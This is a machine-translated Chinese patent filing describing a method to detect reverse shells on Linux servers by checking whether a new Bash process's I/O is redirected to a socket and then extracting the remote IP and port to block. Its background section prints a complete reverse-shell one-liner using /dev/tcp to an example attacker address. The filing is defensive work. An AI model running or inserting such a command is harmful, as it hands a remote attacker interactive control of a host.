CN110138727A - The information searching method and device that the shell that rebounds is connected to the network - Google Patents
The information searching method and device that the shell that rebounds is connected to the network Download PDFInfo
- Publication number
- CN110138727A CN110138727A CN201910245773.9A CN201910245773A CN110138727A CN 110138727 A CN110138727 A CN 110138727A CN 201910245773 A CN201910245773 A CN 201910245773A CN 110138727 A CN110138727 A CN 110138727A
- Authority
- CN
- China
- Prior art keywords
- network connection
- file
- bash
- bash process
- rebound
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention discloses the information searching methods and device of a kind of rebound shell network connection.Wherein, the information searching method of rebound shell network connection includes: to monitor Bash process creation event;When listening to Bash process creation, judge whether the corresponding redirection file of Bash process is socket file;If so, determining that Bash process is rebound shell process, rebound shell network connection is judged whether there is according to socket file descriptor;If, then confirm that server has rebound shell attack, the two combines the accuracy for improving rebound shell detection, obtain the IP address and port numbers of rebound shell network connection, by being accurately obtained IP address and port numbers, IP address and port numbers are shielded, safety can be promoted, attacker can be terminated in time and wants the behavior for permission extraction being carried out by rebound shell and loophole executes, and avoid the generation of security incident.
Description
Technical field
The present invention relates to field of computer technology, and in particular to a kind of information searching method of rebound shell network connection
And device.
Background technique
Existing network attack is usually website attacker using loophole existing for website, is attacked to Website server
It hits, takes place frequently so as to cause security incident, this attack, which not only impacts corporate image, can also generate economic loss.Wherein,
Invading website by Webshell is the common attack means of attacker.After Web attacker takes the Webshell of Web server
It needs to propose power, proposes power and need the running environment that can be interacted, therefore attacker needs first to rebound the shell that can be interacted,
Then related command is executed in order line terminal carry out the operation such as permission extraction.Once attacker successfully passes rebound shell's
After interactive environment gets the highest permission of server, can continue with the interactive environment to server carry out other attacks and
Vulnerability exploit.If can find that certain server has rebound shell in time, and the rebound closed and detected of taking measures on customs clearance
Shell connection can terminate attack of the attacker to Web server in first time.
Existing Webshell detection technique pays close attention to how killing back door script file is i.e. to Webshell script text
The killing of part.In rebound shell context of detection, existing patent " a kind of 201710540141.6 detections and prevention rebound shell
Method and system " by capture execute shell program movement, judge shell process whether tape terminal determined property should
Whether shell program is rebound shell.If it is rebound shell, then to rebound shell process issue termination signal, kill into
Journey, and the IP address and port numbers of rebound shell network connection can not be accurately obtained.
Summary of the invention
In view of the above problems, it proposes on the present invention overcomes the above problem or at least be partially solved in order to provide one kind
State the information searching method and device of the rebound shell network connection of problem.
According to an aspect of the invention, there is provided a kind of information searching method of rebound shell network connection, comprising:
Monitor Bash process creation event;
When listening to Bash process creation, judge whether the corresponding redirection file of Bash process is socket file;
If so, determining that Bash process is rebound shell process, judged whether there is instead according to socket file descriptor
Play shell network connection;
If so, obtaining the IP address and port numbers of rebound shell network connection.
According to another aspect of the present invention, a kind of information searching device of rebound shell network connection is provided, comprising:
Module is monitored, Bash process creation event is adapted for listening for;
First judgment module, suitable for when listening to Bash process creation, judging the corresponding redirection file of Bash process
It whether is socket file;
Second judgment module, if be suitable for the corresponding redirection file of Bash process be socket file, it is determined that Bash into
Journey is rebound shell process, judges whether there is rebound shell network connection according to socket file descriptor;
Module is obtained, if being suitable for judging to exist rebound shell network connection according to socket file descriptor, is obtained anti-
Play the IP address and port numbers of shell network connection.
According to another aspect of the invention, provide a kind of calculating equipment, comprising: processor, memory, communication interface and
Communication bus, processor, memory and communication interface complete mutual communication by communication bus;
Memory makes processor execute above-mentioned rebound shell net for storing an at least executable instruction, executable instruction
The corresponding operation of information searching method of network connection.
In accordance with a further aspect of the present invention, a kind of computer storage medium is provided, at least one is stored in storage medium
Executable instruction, the information searching method that executable instruction executes processor such as above-mentioned rebound shell network connection are corresponding
Operation.
The scheme provided according to the present invention monitors Bash process creation event;When listening to Bash process creation, judgement
Whether the corresponding redirection file of Bash process is socket file;If so, determine that Bash process is rebound shell process,
Rebound shell network connection is judged whether there is according to socket file descriptor;Connect if so, obtaining rebound shell network
The IP address and port numbers connect.Based on scheme provided by the invention, by whether judging the corresponding redirection file of Bash process
For socket file, it is connected to the network if so, determining whether there is rebound shell according to the socket file descriptor, thus
Confirm that server has rebound shell attack, the two combines the accuracy for improving rebound shell detection, rebounds determining
In the case that shell is connected to the network, the IP address and port numbers of rebound shell network connection are obtained, it can be to IP address and end
Slogan carries out shielding processing, wants the row for carrying out permission extraction by rebound shell and loophole executes to terminate attacker in time
To avoid the generation of security incident.
The above description is only an overview of the technical scheme of the present invention, in order to better understand the technical means of the present invention,
And it can be implemented in accordance with the contents of the specification, and in order to allow above and other objects of the present invention, feature and advantage can
It is clearer and more comprehensible, the followings are specific embodiments of the present invention.
Detailed description of the invention
By reading the following detailed description of the preferred embodiment, various other advantages and benefits are common for this field
Technical staff will become clear.The drawings are only for the purpose of illustrating a preferred embodiment, and is not considered as to the present invention
Limitation.And throughout the drawings, the same reference numbers will be used to refer to the same parts.In the accompanying drawings:
Fig. 1 is rebound shell schematic diagram;
Fig. 2 shows the processes of the information searching method of rebound shell network connection according to an embodiment of the invention
Schematic diagram;
Fig. 3 shows the stream of the information searching method of rebound shell network connection in accordance with another embodiment of the present invention
Journey schematic diagram;
Fig. 4 shows the structure of the information searching device of rebound shell network connection according to an embodiment of the invention
Schematic diagram;
Fig. 5 shows the structural schematic diagram according to an embodiment of the invention for calculating equipment.
Specific embodiment
Exemplary embodiments of the present disclosure are described in more detail below with reference to accompanying drawings.Although showing the disclosure in attached drawing
Exemplary embodiment, it being understood, however, that may be realized in various forms the disclosure without should be by embodiments set forth here
It is limited.On the contrary, these embodiments are provided to facilitate a more thoroughly understanding of the present invention, and can be by the scope of the present disclosure
It is fully disclosed to those skilled in the art.
Fig. 1 is rebound shell schematic diagram, and in scene shown in Fig. 1, destination host is an intranet host, without public network
IP address, attacker can not initiate the long-range connection to destination host from outer net, in order to obtain convenient directly operation destination host
Interactive environment, it is necessary to propose power operation to destination host.Attacker executes bash order using the Webshell obtained:
0>&1 of bash-i>&/dev/tcp/119.119.119.119/7777 is actively initiated one by destination host after running the order
The shell of rebound to outer net attacker machine 119.119.119.119, obtains the shell terminal control environment of destination host.Needle
To such case, it is necessary to find the IP address and port numbers of rebound shell network connection, accurately to block rebound
Shell prevents attack of the attacker to destination host.
IP address and port numbers are accurately found in order to realize, inventor proposes one kind can be timely
Accurately find the method and device of IP address and port numbers.It is illustrated combined with specific embodiments below.
Fig. 2 shows the processes of the information searching method of rebound shell network connection according to an embodiment of the invention
Schematic diagram.As shown in Fig. 2, method includes the following steps:
Step S200 monitors Bash process creation event.
In order in time to rebound shell block, need to find whether Bash process creates in time, specifically,
It can determine whether to create Bash process using following methods: Bash process creation event is monitored, for example, by following
Ring traversal/proc file mode.In the present embodiment, monitor Bash process creation event with it is timely discovery creation Bash into
Journey, to block rebound shell to provide detection basis.
Step S201 judges whether the corresponding redirection file of Bash process is set when listening to Bash process creation
Word file is connect, if so, thening follow the steps S202.
Under normal circumstances, Bash process can be directed in terminal device file, for example,/dev/pts/0 file ,/dev/
Pts/1 file.If attacker carries out rebound shell by Bash process, redirecting technique is generallyd use, is redirected to socket
In file.
It in order to accurately block rebound shell, and is further promoted and blocks ground accuracy rate, avoid the occurrence of wrong blocking
The case where, after listening to Bash process creation, need it is further judged, specifically, judge that Bash process is corresponding heavy
Orient whether file is socket file.
Step S202 determines that Bash process for rebound shell process, is judged whether there is according to socket file descriptor
Rebound shell network connection.
Judge the corresponding redirection file of Bash process be socket file in the case where, can determine the Bash into
Journey is rebound shell process, which actively creates an external connection.But there may be the processes and failed
Corresponding network connection or the already off situation of corresponding network connection are initiated, therefore, it is necessary to judge whether there is rebound
Shell network connection.
Socket file is corresponding with corresponding socket file descriptor, marks socket filec descriptor here with FD,
Under normal conditions, therefore all corresponding FD value of every network connection can judge whether to deposit according to socket file descriptor FD
In rebound shell network connection.
Step S203 obtains the IP address and port numbers of rebound shell network connection.
It, can be according to socket file in the case where determining that there is rebound shell is connected to the network according to socket file
Descriptor FD gets the IP address and port numbers of rebound shell network connection.
IP address and port numbers are the key that attacker realizes to destination host progress loophole attack, are getting IP address
And after port numbers, shielding processing can be carried out to IP address and port numbers, realize the rate of discharge for intercepting IP address and port numbers,
Rate of discharge is avoided to be output to destination host, to thoroughly prevent utilization of the attacker to rebound shell.
The method provided according to that above embodiment of the present invention monitors Bash process creation event;When listening to Bash process
When creation, judge whether the corresponding redirection file of Bash process is socket file;If so, determining that Bash process is rebound
Shell process judges whether there is rebound shell network connection according to socket file descriptor;If so, obtaining rebound
The IP address and port numbers of shell network connection.Based on scheme provided by the invention, reset by judging that Bash process is corresponding
It whether is socket file to file, if so, determining whether there is rebound shell network according to the socket file descriptor
Connection thereby confirms that server has rebound shell attack, and the two combines the accuracy for improving rebound shell detection, true
Surely in the case where rebound shell network connection, the IP address and port numbers of rebound shell network connection are obtained, it can to IP
Location and port numbers carry out shielding processing, and to terminate in time, attacker wants to carry out permission extraction by rebound shell and loophole is held
Capable behavior avoids the generation of security incident.
Fig. 3 shows the stream of the information searching method of rebound shell network connection in accordance with another embodiment of the present invention
Journey schematic diagram.As shown in figure 3, method includes the following steps:
Step S300 subscribes to the creation notification message of Bash process by the subscribing mechanism that kernel provides.
Bash process is monitored by way of traversal/proc file, it is easy to be occurred, searching loop/proc file frequency
Rate is excessively high, then will increase the operation load of server system, may leak if searching loop/proc file frequency is too low
The case where fall'sing runing time shorter Bash process appearance, it is easy to which appearance cannot block rebound shell in time, cause to attack
Person successfully passes rebound shell and carries out proposing power, is correspondingly attacked.
In order to accurately and timely block rebound shell, need to find Bash process creation, therefore, this reality in time
The creation that example no longer finds Bash process by the way of searching loop/proc file is applied, but is sent out in time by subscribing manner
The creation of existing Bash process specifically subscribes to the creation notification message of Bash process by the subscribing mechanism that kernel provides.Kernel
Process creation can be captured, and generates creation notification message, the information searching device of rebound shell network connection passes through subscription
The creation notification message, knows and creates Bash process.
Step S301 searches Bash process pair according to the process identification (PID) of Bash process when receiving creation notification message
The redirection file answered.
When receiving creation notification message, can determine and create Bash process, in order to it is accurate and timely into
Row rebound shell blocking, need it is further to Bash process judged, judge Bash process whether be rebound shell into
Journey specifically can determine whether Bash process is rebound shell process according to the method in step S301- step S303.
After determination creates Bash process, the progress information of Bash process is got, for example, process identification (PID) PID, is being obtained
After getting process identification (PID), the corresponding redirection file of Bash process can be searched according to the process identification (PID) of Bash process, for example, logical
The matched mode of process identification (PID) is crossed, determines the corresponding redirection file of Bash process, wherein the corresponding redirection text of Bash process
Part is that the standard input and output of Bash process and standard error export corresponding redirection file.
Step S302 judges whether the name format of the corresponding redirection file of Bash process is default name format, if
It is to then follow the steps S303;If it is not, thening follow the steps S307.
Under normal conditions, socket file has fixed name format, for example, carrying character " socket ", here
It is merely illustrative of, in this way, whether can be default life by judging the name format of the corresponding redirection file of Bash process
Name format, to determine whether the corresponding redirection file of Bash process is socket file.
Step S303 determines that the corresponding redirection file of Bash process is socket file, determines Bash process for rebound
Shell process.
It, can be in the case where judging the name format of the corresponding redirection file of Bash process is default name format
Determine that the corresponding redirection file of Bash process is socket file, so that it is determined that Bash process is rebound shell process.
Step S304 obtains the socket file descriptor of the corresponding redirection file of Bash process.
It, can be according to Bash process in the case where it is socket file that the corresponding redirection file of Bash process, which has been determined,
Process identification (PID) obtain the socket file descriptor of the corresponding redirection file of Bash process, for example, being looked into according to process identification (PID)
/ proc/PID/FD file is looked for, the socket file descriptor of the corresponding redirection file of Bash process is obtained.
Step S305, judge all-network connection in the presence or absence of any network connection socket file descriptor with
The socket file descriptor of the corresponding redirection file of Bash process matches, if so, thening follow the steps S306;If it is not, then
Method terminates.
The information searching device of rebound shell network connection can get the link information of all-network connection, wherein
The all corresponding FD value of each network connection therefore can be by the FD of the corresponding redirection file of Bash process and/proc/
In net/tcp all-network connect FD compare, with determine all-network connection in the presence or absence of any network connection FD with
The FD of the corresponding redirection file of Bash process matches, and the FD of redirection file corresponding with Bash process is identical if it exists
Network connection can then determine the network connection for rebound shell network connection;It is corresponding with Bash process if it does not exist to reset
The identical network connection of FD to file can determine the Bash process and initiate corresponding network connection or right not successfully
The network connection answered is already off.
Step S306 determines that the network connection is connected to the network for rebound shell, and according to socket file descriptor acquiring
The IP address and port numbers of the network connection.
There are the socket file descriptors of any network connection and Bash process pair in judging all-network connection
In the case that the socket file descriptor for the redirection file answered matches, the network connection can be determined for rebound shell
Network connection, so as to according to the IP address and port numbers of the network connection of socket file descriptor acquiring, for example, according to
Socket file descriptor gets IP address and port from the preset field (such as rem_address field) in network connection
Number.
IP address and port numbers are the key that attacker realizes to destination host progress loophole attack, are getting IP address
And after port numbers, shielding processing can be carried out to IP address and port numbers, realize the rate of discharge for intercepting IP address and port numbers,
Rate of discharge is avoided to be output to destination host, to thoroughly prevent utilization of the attacker to rebound shell.
Step S307 determines that the corresponding redirection file of Bash process is terminal device file, then method terminates.
In the case where the name format of the corresponding redirection file of Bash process is not default name format, can determine
The corresponding redirection file of Bash process is terminal device file, and Bash process is normal procedure, then method terminates.
The method provided according to that above embodiment of the present invention creates notification message by subscribing to, can timely and accurately really
Surely Bash process is created, so as to block rebound shell in time, prevents attacker from attacking, solves existing skill
Since bash process creation cannot be found in time in art, causes attacker that can successfully pass rebound shell and carry out proposing power
Problem.By judging whether the corresponding redirection file of Bash process is socket file, if so, according to the socket file
Descriptor determines whether there is rebound shell network connection, thereby confirms that server has rebound shell attack, the two combines
The accuracy for improving rebound shell detection obtains rebound shell network in the case where determining rebound shell network connection
The IP address and port numbers of connection can carry out shielding processing to IP address and port numbers, want to lead to terminate attacker in time
The behavior that rebound shell carries out permission extraction and loophole executes is crossed, the generation of security incident is avoided.
Fig. 4 shows the structure of the information searching device of rebound shell network connection according to an embodiment of the invention
Schematic diagram.As shown in figure 4, the device includes: to monitor module 400, first judgment module 401, the second judgment module 402, obtain
Module 403.
Module 400 is monitored, Bash process creation event is adapted for listening for;
First judgment module 401, suitable for when listening to Bash process creation, judging the corresponding redirection text of Bash process
Whether part is socket file;
Second judgment module 402, if being suitable for the corresponding redirection file of Bash process is socket file, it is determined that Bash
Process is rebound shell process, judges whether there is rebound shell network connection according to socket file descriptor;
Module 403 is obtained, if being suitable for judging to exist rebound shell network connection according to socket file descriptor, is obtained
Negate the IP address and port numbers for playing shell network connection.
Optionally, the second judgment module 402 is further adapted for: obtaining the socket of the corresponding redirection file of Bash process
Filec descriptor;
Judge the socket file descriptor and Bash process pair in all-network connection with the presence or absence of any network connection
The socket file descriptor for the redirection file answered matches;
If so, determining that the network connection is rebound shell network connection.
Optionally, it monitors module 400 to be further adapted for: subscribing to the creation of Bash process by the subscribing mechanism that kernel provides
Notification message.
Optionally, first judgment module 401 is further adapted for: searching Bash process pair according to the process identification (PID) of Bash process
The redirection file answered;
Whether the name format for judging the corresponding redirection file of Bash process is default name format;
If so, determining that the corresponding redirection file of Bash process is socket file.
Optionally, the corresponding redirection file of Bash process is the standard input and output and standard error output of Bash process
Corresponding redirection file.
The device provided according to that above embodiment of the present invention monitors Bash process creation event;When listening to Bash process
When creation, judge whether the corresponding redirection file of Bash process is socket file;If so, determining that Bash process is rebound
Shell process judges whether there is rebound shell network connection according to socket file descriptor;If so, obtaining rebound
The IP address and port numbers of shell network connection.Based on scheme provided by the invention, reset by judging that Bash process is corresponding
It whether is socket file to file, if so, determining whether there is rebound shell network according to the socket file descriptor
Connection thereby confirms that server has rebound shell attack, and the two combines the accuracy for improving rebound shell detection, true
Surely in the case where rebound shell network connection, the IP address and port numbers of rebound shell network connection are obtained, it can to IP
Location and port numbers carry out shielding processing, and to terminate in time, attacker wants to carry out permission extraction by rebound shell and loophole is held
Capable behavior avoids the generation of security incident.
The embodiment of the present application also provides a kind of nonvolatile computer storage media, the computer storage medium storage
There is an at least executable instruction, which can be performed the rebound shell net in above-mentioned any means embodiment
The information searching method of network connection.
Fig. 5 shows the structural schematic diagram according to an embodiment of the invention for calculating equipment, the specific embodiment of the invention
The specific implementation for calculating equipment is not limited.
As shown in figure 5, the calculating equipment may include: processor (processor) 502, communication interface
(Communications Interface) 504, memory (memory) 506 and communication bus 508.
Wherein:
Processor 502, communication interface 504 and memory 506 complete mutual communication by communication bus 508.
Communication interface 504, for being communicated with the network element of other equipment such as client or other servers etc..
Processor 502 can specifically execute the information searching of above-mentioned rebound shell network connection for executing program 510
Correlation step in embodiment of the method.
Specifically, program 510 may include program code, which includes computer operation instruction.
Processor 502 may be central processor CPU or specific integrated circuit ASIC (Application
Specific Integrated Circuit), or be arranged to implement the integrated electricity of one or more of the embodiment of the present invention
Road.The one or more processors that equipment includes are calculated, can be same type of processor, such as one or more CPU;It can also
To be different types of processor, such as one or more CPU and one or more ASIC.
Memory 506, for storing program 510.Memory 506 may include high speed RAM memory, it is also possible to further include
Nonvolatile memory (non-volatile memory), for example, at least a magnetic disk storage.
Program 510 specifically can be used for so that processor 502 executes the rebound shell net in above-mentioned any means embodiment
The information searching method of network connection.The specific implementation of each step may refer to above-mentioned rebound shell network connection in program 510
Corresponding description in corresponding steps and unit in information searching embodiment, this will not be repeated here.Those skilled in the art can
To be well understood, for convenience and simplicity of description, the equipment of foregoing description and the specific work process of module can be referred to
Corresponding process description in preceding method embodiment, details are not described herein.
Algorithm and display are not inherently related to any particular computer, virtual system, or other device provided herein.
Various general-purpose systems can also be used together with teachings based herein.As described above, it constructs required by this kind of system
Structure be obvious.In addition, the present invention is also not directed to any particular programming language.It should be understood that can use various
Programming language realizes summary of the invention described herein, and the description done above to language-specific is to disclose this hair
Bright preferred forms.
In the instructions provided here, numerous specific details are set forth.It is to be appreciated, however, that implementation of the invention
Example can be practiced without these specific details.In some instances, well known method, structure is not been shown in detail
And technology, so as not to obscure the understanding of this specification.
Similarly, it should be understood that in order to simplify the disclosure and help to understand one or more of the various inventive aspects,
Above in the description of exemplary embodiment of the present invention, each feature of the invention is grouped together into single implementation sometimes
In example, figure or descriptions thereof.However, the disclosed method should not be interpreted as reflecting the following intention: i.e. required to protect
Shield the present invention claims features more more than feature expressly recited in each claim.More precisely, as following
Claims reflect as, inventive aspect is all features less than single embodiment disclosed above.Therefore,
Thus the claims for following specific embodiment are expressly incorporated in the specific embodiment, wherein each claim itself
All as a separate embodiment of the present invention.
Those skilled in the art will understand that can be carried out adaptively to the module in the equipment in embodiment
Change and they are arranged in one or more devices different from this embodiment.It can be the module or list in embodiment
Member or component are combined into a module or unit or component, and furthermore they can be divided into multiple submodule or subelement or
Sub-component.Other than such feature and/or at least some of process or unit exclude each other, it can use any
Combination is to all features disclosed in this specification (including adjoint claim, abstract and attached drawing) and so disclosed
All process or units of what method or apparatus are combined.Unless expressly stated otherwise, this specification is (including adjoint power
Benefit require, abstract and attached drawing) disclosed in each feature can carry out generation with an alternative feature that provides the same, equivalent, or similar purpose
It replaces.
In addition, it will be appreciated by those of skill in the art that although some embodiments described herein include other embodiments
In included certain features rather than other feature, but the combination of the feature of different embodiments mean it is of the invention
Within the scope of and form different embodiments.For example, in the following claims, embodiment claimed is appointed
Meaning one of can in any combination mode come using.
Various component embodiments of the invention can be implemented in hardware, or to run on one or more processors
Software module realize, or be implemented in a combination thereof.It will be understood by those of skill in the art that can be used in practice
Microprocessor or digital signal processor (DSP) realize the letter of rebound shell network connection according to an embodiment of the present invention
Breath searches some or all functions of some or all components in equipment.The present invention is also implemented as executing this
In described method some or all device or device programs (for example, computer program and computer program
Product).It is such to realize that program of the invention can store on a computer-readable medium, it either can have one or more
The form of a signal.Such signal can be downloaded from an internet website to obtain, be perhaps provided on the carrier signal or with
Any other form provides.
It should be noted that the above-mentioned embodiments illustrate rather than limit the invention, and ability
Field technique personnel can be designed alternative embodiment without departing from the scope of the appended claims.In the claims,
Any reference symbol between parentheses should not be configured to limitations on claims.Word "comprising" does not exclude the presence of not
Element or step listed in the claims.Word "a" or "an" located in front of the element does not exclude the presence of multiple such
Element.The present invention can be by means of including the hardware of several different elements and being come by means of properly programmed computer real
It is existing.In the unit claims listing several devices, several in these devices can be through the same hardware branch
To embody.The use of word first, second, and third does not indicate any sequence.These words can be explained and be run after fame
Claim.
The invention discloses: a kind of information searching method of rebound shell network connection of A1., comprising:
Monitor Bash process creation event;
When listening to Bash process creation, judge whether the corresponding redirection file of Bash process is socket file;
If so, determining that the Bash process is rebound shell process, judge whether to deposit according to socket file descriptor
In rebound shell network connection;
If so, obtaining the IP address and port numbers of rebound shell network connection.
A2. method according to a1, wherein described that rebound is judged whether there is according to socket file descriptor
Shell network connection further comprises:
Obtain the socket file descriptor of the corresponding redirection file of the Bash process;
Judge all-network connection in the presence or absence of any network connection socket file descriptor and the Bash into
The socket file descriptor of the corresponding redirection file of journey matches;
If so, determining that the network connection is rebound shell network connection.
A3. method according to a1 or a2, wherein the monitoring Bash process creation event further comprises:
The creation notification message of Bash process is subscribed to by the subscribing mechanism that kernel provides.
A4. method according to a1 or a2, wherein described to judge whether the corresponding redirection file of Bash process is set
Connecing word file further comprises:
The corresponding redirection file of Bash process is searched according to the process identification (PID) of the Bash process;
Whether the name format for judging the corresponding redirection file of the Bash process is default name format;
If so, determining that the corresponding redirection file of the Bash process is socket file.
A5. method according to a1 or a2, wherein the corresponding redirection file of the Bash process is Bash process
Standard input and output and standard error export corresponding redirection file.
B6. a kind of information searching device of rebound shell network connection, comprising:
Module is monitored, Bash process creation event is adapted for listening for;
First judgment module, suitable for when listening to Bash process creation, judging the corresponding redirection file of Bash process
It whether is socket file;
Second judgment module, if being suitable for the corresponding redirection file of Bash process is socket file, it is determined that described
Bash process is rebound shell process, judges whether there is rebound shell network connection according to socket file descriptor;
Module is obtained, if being suitable for judging to exist rebound shell network connection according to socket file descriptor, is obtained anti-
Play the IP address and port numbers of shell network connection.
B7. the device according to B6, wherein second judgment module is further adapted for:
Obtain the socket file descriptor of the corresponding redirection file of the Bash process;
Judge all-network connection in the presence or absence of any network connection socket file descriptor and the Bash into
The socket file descriptor of the corresponding redirection file of journey matches;
If so, determining that the network connection is rebound shell network connection.
B8. the device according to B6 or B7, wherein the module of monitoring is further adapted for: being ordered by what kernel provided
Read the creation notification message that mechanism subscribes to Bash process.
B9. the device according to B6 or B7, wherein the first judgment module is further adapted for: according to the Bash
The corresponding redirection file of Bash process is searched in the process identification (PID) of process;
Whether the name format for judging the corresponding redirection file of the Bash process is default name format;
If so, determining that the corresponding redirection file of the Bash process is socket file.
B10. the device according to B6 or B7, wherein the corresponding redirection file of the Bash process is Bash process
Standard input and output and standard error export corresponding redirection file.
C11. a kind of calculating equipment, comprising: processor, memory, communication interface and communication bus, the processor, institute
It states memory and the communication interface completes mutual communication by the communication bus;
The memory executes the processor such as storing an at least executable instruction, the executable instruction
The corresponding operation of information searching method of rebound shell network connection described in any one of A1-A5.
D12. a kind of computer storage medium is stored with an at least executable instruction in the storage medium, described to hold
It is corresponding that row instruction makes processor execute the information searching method that the rebound shell as described in any one of A1-A5 is connected to the network
Operation.
Claims (10)
1. a kind of information searching method of rebound shell network connection, comprising:
Monitor Bash process creation event;
When listening to Bash process creation, judge whether the corresponding redirection file of Bash process is socket file;
If so, determining that the Bash process is rebound shell process, judged whether there is instead according to socket file descriptor
Play shell network connection;
If so, obtaining the IP address and port numbers of rebound shell network connection.
2. described to judge whether there is rebound according to socket file descriptor according to the method described in claim 1, wherein
Shell network connection further comprises:
Obtain the socket file descriptor of the corresponding redirection file of the Bash process;
Judge the socket file descriptor and the Bash process pair in all-network connection with the presence or absence of any network connection
The socket file descriptor for the redirection file answered matches;
If so, determining that the network connection is rebound shell network connection.
3. method according to claim 1 or 2, wherein the monitoring Bash process creation event further comprises:
The creation notification message of Bash process is subscribed to by the subscribing mechanism that kernel provides.
4. method according to claim 1 or 2, wherein it is described judge the corresponding redirection file of Bash process whether be
Socket file further comprises:
The corresponding redirection file of Bash process is searched according to the process identification (PID) of the Bash process;
Whether the name format for judging the corresponding redirection file of the Bash process is default name format;
If so, determining that the corresponding redirection file of the Bash process is socket file.
5. method according to claim 1 or 2, wherein the corresponding redirection file of the Bash process is Bash process
Standard input and output and standard error export corresponding redirection file.
6. a kind of information searching device of rebound shell network connection, comprising:
Module is monitored, Bash process creation event is adapted for listening for;
First judgment module, suitable for whether when listening to Bash process creation, judging the corresponding redirection file of Bash process
For socket file;
Second judgment module, if be suitable for the corresponding redirection file of Bash process be socket file, it is determined that the Bash into
Journey is rebound shell process, judges whether there is rebound shell network connection according to socket file descriptor;
Module is obtained, if being suitable for judging to exist rebound shell network connection according to socket file descriptor, obtains rebound
The IP address and port numbers of shell network connection.
7. device according to claim 6, wherein second judgment module is further adapted for:
Obtain the socket file descriptor of the corresponding redirection file of the Bash process;
Judge the socket file descriptor and the Bash process pair in all-network connection with the presence or absence of any network connection
The socket file descriptor for the redirection file answered matches;
If so, determining that the network connection is rebound shell network connection.
8. device according to claim 6 or 7, wherein the module of monitoring is further adapted for: being ordered by what kernel provided
Read the creation notification message that mechanism subscribes to Bash process.
9. a kind of calculating equipment, comprising: processor, memory, communication interface and communication bus, the processor, the storage
Device and the communication interface complete mutual communication by the communication bus;
The memory executes the processor as right is wanted for storing an at least executable instruction, the executable instruction
Ask the corresponding operation of information searching method of rebound shell network connection described in any one of 1-5.
10. a kind of computer storage medium, an at least executable instruction, the executable instruction are stored in the storage medium
The information searching method for making processor execute rebound shell network connection according to any one of claims 1 to 5 is corresponding
Operation.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910245773.9A CN110138727A (en) | 2019-03-28 | 2019-03-28 | The information searching method and device that the shell that rebounds is connected to the network |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910245773.9A CN110138727A (en) | 2019-03-28 | 2019-03-28 | The information searching method and device that the shell that rebounds is connected to the network |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN110138727A true CN110138727A (en) | 2019-08-16 |
Family
ID=67568576
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910245773.9A Pending CN110138727A (en) | 2019-03-28 | 2019-03-28 | The information searching method and device that the shell that rebounds is connected to the network |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110138727A (en) |
Cited By (11)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110535724A (en) * | 2019-08-28 | 2019-12-03 | 深圳市网心科技有限公司 | Application program net reading and writing method for limiting, device, electronic equipment and storage medium |
| CN110909349A (en) * | 2019-11-14 | 2020-03-24 | 上海携程商务有限公司 | detection method and system for rebound shell in docker container |
| CN111857965A (en) * | 2020-07-28 | 2020-10-30 | 浙江军盾信息科技有限公司 | Intranet threat detection method, device, equipment and computer equipment |
| CN111988302A (en) * | 2020-08-14 | 2020-11-24 | 苏州浪潮智能科技有限公司 | Method, system, terminal and storage medium for detecting rebound program |
| CN112165469A (en) * | 2020-09-18 | 2021-01-01 | 中国船舶重工集团公司第七一四研究所 | Method for detecting deformed shell |
| CN113449298A (en) * | 2020-03-24 | 2021-09-28 | 百度在线网络技术(北京)有限公司 | Detection method, device, equipment and medium for rebounding shell process |
| CN113515743A (en) * | 2021-03-23 | 2021-10-19 | 杭州安恒信息技术股份有限公司 | Identification method and device of call chain of rebound shell process and electronic device |
| CN114039787A (en) * | 2021-11-15 | 2022-02-11 | 厦门服云信息科技有限公司 | Rebound shell detection method in linux system, terminal device and storage medium |
| CN114722396A (en) * | 2022-05-18 | 2022-07-08 | 北京长亭未来科技有限公司 | Method, system and equipment for detecting rebound Shell process |
| WO2022222255A1 (en) * | 2021-04-23 | 2022-10-27 | 杭州安恒信息技术股份有限公司 | Reverse shell risk determination method, apparatus and system |
| CN115695405A (en) * | 2021-07-28 | 2023-02-03 | 中移物联网有限公司 | Equipment control method, device, control terminal, execution terminal and service terminal |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20140259105A1 (en) * | 2013-03-06 | 2014-09-11 | Massoud Alibakhsh | System and method for securely accessing data through web applications |
| CN107423622A (en) * | 2017-07-04 | 2017-12-01 | 上海高重信息科技有限公司 | A kind of method and system for detecting and taking precautions against bounce-back shell |
| US20180077201A1 (en) * | 2016-09-15 | 2018-03-15 | Paypal, Inc. | Enhanced Security Techniques for Remote Reverse Shell Prevention |
-
2019
- 2019-03-28 CN CN201910245773.9A patent/CN110138727A/en active Pending
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20140259105A1 (en) * | 2013-03-06 | 2014-09-11 | Massoud Alibakhsh | System and method for securely accessing data through web applications |
| US20180077201A1 (en) * | 2016-09-15 | 2018-03-15 | Paypal, Inc. | Enhanced Security Techniques for Remote Reverse Shell Prevention |
